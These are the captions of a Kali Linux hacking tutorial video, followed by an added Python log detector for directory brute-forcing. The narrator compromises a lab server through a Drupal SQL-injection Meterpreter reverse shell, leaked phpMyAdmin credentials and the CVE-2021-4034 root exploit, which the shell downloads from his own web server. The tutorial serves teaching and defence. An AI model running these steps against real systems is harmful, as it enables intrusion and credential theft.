Kali Linux Tutorial For Beginners!

Captions
So today we'll be learning about Kali Linux and how we can use Kali Linux to run simple penetration testing or ethical hacking against a target device, and that device could be a mobile device, it could be a router, it could be a target server. Either way, we are able to break into it.

There are four items you want to think about when it comes to running ethical hacking and penetration testing against a target device. The first part is about discovering all of the devices within the network. So you could be joining, say, a Wi-Fi network, you could be joining an office network; whichever the case, it's about discovery of all the devices within the network. The second part is about identifying the services within the device. So say, for example, you have targeted a server, and perhaps in that server there is a specific service, like, say, a web server. So the web server is the target that you want to go after, because of a missed patch or a vulnerability or a misconfiguration within the website itself. Once you discover all these different services and their versions, you want to find an exploit that is available so that you are able to take advantage of that vulnerability, and afterwards use that exploit to gain control of that specific service. And finally, you want to be able to elevate your privileges so that you're able to do further types of attacks within this device, because you are coming in as a limited user and you may not have all of the permissions to make changes and modifications to the server. With elevated privileges, say, for example, root, you'll be able to do much more.

And yes, kids, hacking is illegal. If you get caught hacking, do not tell them that you know who is Hacker Loi. If you want to run any of these hacking activities, only do it in your own lab environment, or if you've gotten consent from the target company, and of course don't try to hack Hacker Loi with whatever you're learning today. Remember to smash the like button and turn on notifications for the channel so that you don't get hacked.

So right in front of us we're in Kali Linux, and Kali Linux is going to be our ethical hacking and penetration testing tool, and it's awesome. Here you can see from the left side there's a menu, and in the menu what we can see are the different segments of the software that we can use as part of running simple penetration testing, or even an advanced one. So you can see on the left side we have all these different segments, one, two, three, four, five and so on and so forth, with Information Gathering as a start. So here you can see the following: it's about identifying all the devices and uncovering all the different services in relation to the target device, so you have a lot of different tools right here. Vulnerability Analysis, to look out for all these different services that have different types of vulnerabilities within them. Web Application Analysis, to target more specifically a target website or web server. We can look at databases on the backend so that we can break into them and pull up those password hashes, all this incredibly important, critical data. Password Attacks: password attacks have two forms, either an online or an offline attack. An online attack means that we are going to try targeting the server live; an offline attack is after you've extracted that information from the database, after which you begin cracking or breaking those passwords. Wireless Attacks, where you can look into using different tools to sniff all the different wireless access points within the vicinity, and at the same time you're able to run, like, a brute-force attack against those Wi-Fi networks, or be able to set up fake Wi-Fis. Reverse Engineering, where we'll be looking at how we can look at an application and how it runs in memory. Exploitation Tools are available here as well, so you can easily look out for different exploits to go after those different services. Sniffing and Spoofing: this is the part where we are doing, say, a man-in-the-middle attack, so we can capture all the traffic that is being sent to and from the target device, as well as all the way to the internet. Post Exploitation: what do we do after we have hacked into the device? Can we elevate our privileges? Can we dump out the usernames and passwords file? Forensics, where we want to look into the different types of evidence that can occur as a result of a hack. Reporting Tools: ultimately, if you're running a penetration testing or ethical hacking service for your company, you want a general report to show all these different vulnerabilities and the recommendations that they can take on to protect their devices. Social Engineering Tools, so you can see all these different types of phishing scam emails and so on and so forth, and creating all these fake sites. And finally, Kali and OffSec links that you can check out as part of learning more about cyber security or ethical hacking and penetration testing.

No worries, I know it's a lot of tools out there for us to learn, so I'll be using some of these different tools as part of launching our tactics based on the four key points I've shared with you earlier. And the first item you want to familiarize yourself with in Kali Linux is the terminal. This is the place where we enter all these different commands, parameters and options as part of using the different tools in launching a cyber attack. So the first tool we'll look at: you can enter netdiscover -h. What this does for us is use Address Resolution Protocol to help us uncover all these different devices in the network, and the purpose of Address Resolution Protocol is to map the different IP addresses to MAC addresses, which are the physical addresses. So here what the hacker will be doing is that the hacker on the left side will be using this as a way to communicate, to be able to get all the MAC addresses as well as all the different IP addresses that are connected back to the router or in the network. This will help us discover all these different devices within the network, and the hacker will be able to target the different devices.

Now jumping back to Kali Linux, all we've got to do now is go ahead and enter netdiscover -r followed by 192.168.0.0/24. Once you enter this, we'll be able to run the instruction to discover all the different devices within the network. So I hit enter on that, and you can see right here we're doing all these ARP requests; you can see all the different IP addresses as well as the MAC vendor and hostname for them. Okay, and in today's session we'll be targeting 192.168.0.183.

So the next thing we want to do is use a more precise scan using nmap. You can enter nmap followed by -h to see the help document, and we can see all the different options that are available for us to target the device more specifically. So here what we can do now is enter nmap followed by the target IP address of 192.168.0.183. This is our target device, so go ahead and hit enter on that; it'll be using all the default options that come with nmap as part of a default scan. So here you can see we're scanning that specific IP address, and once we're done with the scan we'll be able to look at all the different services within that device. Right here we're done, so we can see all the different services: we have port 21, we have port 22, 80 and so on and so forth. In this case we are going to go ahead and target HTTP, so this is on port 80, and all you've got to do is go ahead and open up any browser and browse over to that target device, just to see what kind of service is hosted on there. So you can enter 192.168.0.183, hit enter on that, and right here we can see the following: we have Index of, and we have multiple directories. We have chat, drupal, payroll_app.php, phpmyadmin. So go ahead and click on any of them and see what it brings for you. Here you can see in this case we have Drupal; Drupal is a content management system, and it could be exploitable. At the same time we also have chat, okay, so you can enter a name to continue. We can look at payroll_app; there's a login page to this, and we don't know what the username or the password is. And likewise we have phpMyAdmin, which gives us the opportunity to control the values within the database, to manage the tables and all of that. So likewise, once again, over here we have no idea what exactly the username or the password is to access any of these services.

The next thing we want to do is uncover all the different directories and files within, say, the content management system of Drupal. What you can do is enter dirbuster and then followed by the target, so in this case we can say http://192.168.0.183. Hit enter on that, and of course in this case it would have a popup, and what we can do now is just go ahead and target this. So here we can enter http followed by the target of 192.168.0.183, and what we can do now is browse to a specific place where we can use a wordlist to look up all these different directories and files. So we can go to usr, we can go to share, we can go over to wordlists as part of launching the attack against specific websites. In this case we have directory-list 1.0, medium, small, whichever you want to use, so let's go ahead and target directory-list-2.3-small. These are some of the commonly used directory names that we can target, and what we want to do now is specify the directory, so /drupal/. So we've got a target URL, we've got a directory, now we've got the following list of directories; go ahead and click Start, and this will begin crawling through the entire site to look up all these different directories and where they could be running.

So this is a really useful way for us to brute-force a content management system, which has all these commonly used directories. So we receive enough information, and we also know the structure of the content management system. Over here what we are targeting is under drupal, and then under modules, and in modules there's one product called blog, and within blog we've got a couple of really interesting pieces of information that we can go after. In this case we have drupal/modules/blog and blog.info. So all I'm going to do now is right-click, Open in Browser, and we can see the following; let's go ahead and open it up with Mousepad. Once we open it up with Mousepad, we can see the following information here.

So when a hacker is targeting a server, there are several things they're doing as part of launching the attack. First, discover all these different services; say, for example, in this case we are targeting an HTTP server, or a service within the server. What we can do then is uncover what some of the misconfigurations within it are: are there different misconfiguration vulnerabilities, or are there possibly any of these missed patches that the application is not installed with, which we can take advantage of? And sometimes it could just be a simple plugin or library that hasn't been updated for years, which is quite common across the internet. And this is the place where, once we find a loophole, the hacker will then be able to take advantage of it, and after that be able to exploit it, giving them access into the server.

We can further verify this by entering cmseek. So with CMSeeK we can target a specific site to know exactly what version it is running, so we'll select number one for CMS detection and deep scan, and we can target http://192.168.0.183/drupal. Hit enter on that, and you can see the following right here: we have the information of Drupal version 7.

All right, so we know that this is going to be the place for us to search specifically for an exploit that we can use to target version 7 of Drupal. With the discovered information, what we can do now is head over to Metasploit. So we can enter sudo msfconsole, enter your password for it, hit enter on that, and what we can do now is search for specific exploits that we can use as part of targeting that service or the content management system. Here what we can do now is go ahead and enter search followed by drupal, hit enter on that, and we can see we have several options available here. So here, zero, one, two, three, four, five, six, seven; all these are the options available for us, and we're looking out for exploits. So there are exploit/unix/webapp ones, there is the exploit for the Drupal Drupageddon, and all this. We want to take a look at more information per exploit, to see whether these are going to be applicable for the target service. So let's go ahead and enter use 2, and what we can do now is go ahead and enter show info. From the information we can see right here: this module exploits the Drupal HTTP Parameter Key/Value SQL Injection in order to achieve a remote shell on the vulnerable instance; it was tested against Drupal 7.0 and 7.31 and was fixed in 7.32; two methods are available to trigger it, and so on and so forth. So we have all this different information, and with all this information now we can go ahead and target this website to see whether we can break into it.

So all you have to do now is enter show options, and once you enter show options we have LHOST, which is the IP address of the Kali Linux machine, and we have LPORT. If you scroll up further, all we've got to do now is input RHOSTS, which is the target address, and the TARGETURI. You can see right here the following are required, so yes, we need RHOSTS, and yes, we need TARGETURI. So go ahead and enter that: go ahead and enter set RHOSTS 192.168.0.183, and then of course we can enter set TARGETURI, in this case, to /drupal/. Once you have that, go ahead and enter options to review all the different values that you've entered; so we have LHOST, LPORT, we have the TARGETURI, we have RHOSTS. So now, in three, two, one, enter exploit, and you can see the following: started reverse TCP handler on 192.168.0.182:4444, and here you can see the following: Meterpreter session 1 opened. What does it mean? It means that we're in; it's game over. So there you go, we've got multiple sessions right here, and all I've got to do now is enter getuid, and we can see here server username: www-data.

Now let's go in and see how much deeper we can go down the rabbit hole. What I can do is enter shell, so that we are now in a shell, and I can enter pwd to print the working directory. And what I want to do now is see whether we are able to get certain information, so here I can enter, say, for example, cat /etc/shadow. I hit enter on that; oh, permission denied. So we don't have the permission to run certain commands to pull off certain files, directories and information, but this means that we still have the power to go in further and see what other attacks we can use to get more information. One of them: I can see we're in the following; here we are in /var/www/html/drupal, and if you go back over to the site over here, we can see that there's a payroll_app.php. So if I go back over here, what I want to do now is enter cd .. and pwd, and then we can enter ls, and you can see right here payroll_app.php; cat payroll_app.php, I hit enter on this, and we have different information that's available here. One of the things you can find out from all this different code and information right here is a really interesting piece of information, which is that we have root and exploit me. What does this mean? It means that we possibly already have the username as well as the password to some parts of the system. And if I jump back over to the site over here, you can see the following: we have drupal, payroll, phpMyAdmin. So if I click on phpMyAdmin, I enter root and I enter the password exploit me, I click Go; boom, we're in.

The final part of all is about privilege escalation on the Linux system. So right here you can see the following: we're at CVE-2021-4034, and this is the place that we're going into in order to have a privilege escalation within the system. What I can do now is go ahead and download this onto the Kali Linux machine, so I can jump back over to, say, a new terminal, and what I can do now is go ahead and enter git clone, and then we can target over here; this is the link for us to target, and all I've got to do is paste it over here, hit enter on that, and it says the following: cloning into CVE-2021-4034. So we've got the information right here, and we can do the same as well in the target session that we already have. I can cd into /tmp, and once I am in here I can do the same thing: I can enter git clone followed by the link over here, git clone, GitHub, ryaagard, CVE-2021-4034. I hit enter on that, and it says cloning into CVE-2021-4034. While we're doing the cloning here, we may have certain limitations while we are using it as a limited user within the system. As a result of that, we may have to git clone it over to the Kali Linux machine; I want to serve it from an application server so that the target device can then download it from there. So what I'll do now is copy CVE-2021-4034 to /var/www/html. Hit enter on that; so now we are going to target and specify this, so let's go ahead and have the -r for that, and of course it will likewise ask us for sudo because we are copying files over to /var/www/html. So, done. Okay, what we can do now is go ahead and enter sudo systemctl followed by start apache2.service. Hit enter on that, all right, so we started our web server, so that we are hosting the file.

Now jumping back to Metasploit, I can enter sessions -i followed by the session target, so now we are interacting with session 1. I can enter shell, I can cd over to /tmp, enter pwd, and what we can do now is do a wget --recursive followed by --no-parent followed by http://192.168.0.182/CVE-2021-4034/. Hit enter on that; so now we are downloading, and we have downloaded all of the 15 files right here. What I can do now is enter ls, and we can see the following over here: I can cd over to CVE-2021-4034, hit enter on that. Okay, so once I'm here I can enter ls, and of course we can see the following: we have Makefile, README, evil-so.c, exploit.c. So what we can do now is just go ahead and enter make, and all we've got to do now is enter ls, and you can see the following: an extra file right here. I can enter ls -l, so we have an extra file right here, which is exploit, and all I've got to do now is enter ./exploit. Oh wait, before I do that, just to clarify, let me enter whoami: I am www-data. So I enter ./exploit, hit enter on that, now I enter whoami, and we're in. We now have complete control of the entire system with root, and to confirm that, I can enter cat /etc/shadow, hit enter on that; boom, we're in.

The reason why all this is happening is because of missed patches and misconfiguration in the setup of different services within the server, which results in the exploitation of all these different vulnerabilities. So it's critical to update your systems regularly, so that when such critical vulnerabilities are discovered within the services, you quickly update them. You want to use these tools to scan your own websites, looking out for different vulnerability exposures and quickly securing them, looking out for misconfigurations or missed patches and quickly updating them, so that you don't get hacked.
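The dirbuster step above walks a wordlist against /drupal/ and leaves a burst of 404 responses from one client in the web server's access log, which is what a defender of the target box would look for. As an added example (not from the video), here is a small Python detector for that pattern; the log lines, the client addresses and the DirBuster user agent are constructed sample data.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# One line of Apache "combined" access-log format (what apache2 writes by default).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_dir_bruteforce(lines, window_s=60, threshold=20):
    """Flag clients that produce at least `threshold` 404 responses inside any
    `window_s`-second sliding window. Returns {client_ip: peak 404 count in a window}.
    A wordlist scan against /drupal/ shows up as one address generating a burst of 404s."""
    recent = defaultdict(deque)  # client ip -> timestamps of its recent 404s
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 404:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


# Constructed sample traffic (not a real capture): 192.168.0.182, the Kali box from the
# video, probes 25 wordlist names under /drupal/; 192.168.0.50 is an ordinary visitor.
WORDS = ("admin backup cgi-bin config db docs files images includes install lib logs "
         "misc modules old private scripts secure sites temp test themes tmp upload users").split()
_T0 = datetime(2022, 3, 19, 10, 0, 0, tzinfo=timezone(timedelta(hours=8)))


def _line(ip, secs, path, status, ua):
    ts = (_T0 + timedelta(seconds=secs)).strftime(TS_FMT)
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'


SAMPLE_LOG = [_line("192.168.0.50", 0, "/drupal/", 200, "Mozilla/5.0"),
              _line("192.168.0.50", 1, "/favicon.ico", 404, "Mozilla/5.0")]
SAMPLE_LOG += [_line("192.168.0.182", 5 + i, f"/drupal/{w}", 404, "DirBuster-1.0-RC1")
               for i, w in enumerate(WORDS)]
SAMPLE_LOG.append(_line("192.168.0.50", 40, "/drupal/user", 200, "Mozilla/5.0"))

if __name__ == "__main__":
    for ip, n in find_dir_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {n} 404s within 60s, looks like a directory brute force")
```

Point it at a real /var/log/apache2/access.log by passing the file's lines to find_dir_bruteforce; tune window_s and threshold to the site's normal 404 rate.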
Info
Channel: Loi Liang Yang
Views: 313,125
Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp
Id: WUMo7LMRdwA
Length: 17min 58sec (1078 seconds)
Published: Sat Mar 19 2022